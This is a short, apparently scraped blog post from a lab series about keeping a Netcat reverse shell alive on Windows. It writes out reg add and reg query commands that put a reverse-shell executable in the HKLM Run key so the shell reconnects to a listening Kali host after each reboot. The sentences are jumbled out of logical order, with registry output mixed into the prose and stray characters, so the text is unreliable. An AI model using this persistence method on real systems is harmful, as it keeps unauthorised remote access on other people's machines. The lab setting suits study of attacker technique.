#Netcat windows reverse shell how to
If you need to see how to use reg add or reg query you can do reg add /? or reg query /? for the syntax. Here, C:\Lab27\200_shell.exe is our reverse shell payload. UserFaultCheck REG_EXPAND_SZ %systemroot%\system32\dumprep 0 -u VMware User Process REG_SZ "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr VMware Tools REG_SZ "C:\Program Files\VMware\VMware Tools\VMwareTray.exe" HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
Reg query HKLM\software\microsoft\windows\currentversion\run Reg add HKLM\software\microsoft\windows\currentversion\run /v netcat /t REG_SZ /f /d "\"C:\Lab27\200_shell.exe\""Ĭ:\Lab27>reg query HKLM\software\microsoft\windows\currentversion\run The command to add a Registry key to run on restart would be C:\Lab27> reg add HKLM\software\microsoft\windows\currentversion\run /v netcat /t REG_SZ /f /d "\"C:\Lab27\200_shell.exe\"" The registry is a little different for Windows XP. As usual I’m avoiding the use of Meterpreter’s Persistence script and just using cmd. Note that we do not need Powershell for this. Remember to do all this we need SYSTEM or local admin rights. That way when the system restarts, the connection will be broken briefly and re-established to our listening Kali. To maintain access or persistence one could add the reverse shell payload into the startup key of the Registry. In that lab exploiting the first computer and moving across laterally to exploit another system on the same LAN took up a lot of time. This was originally from the previous lab, but it got too lengthy and I thought this deserved a post on its own.
0 kommentar(er)
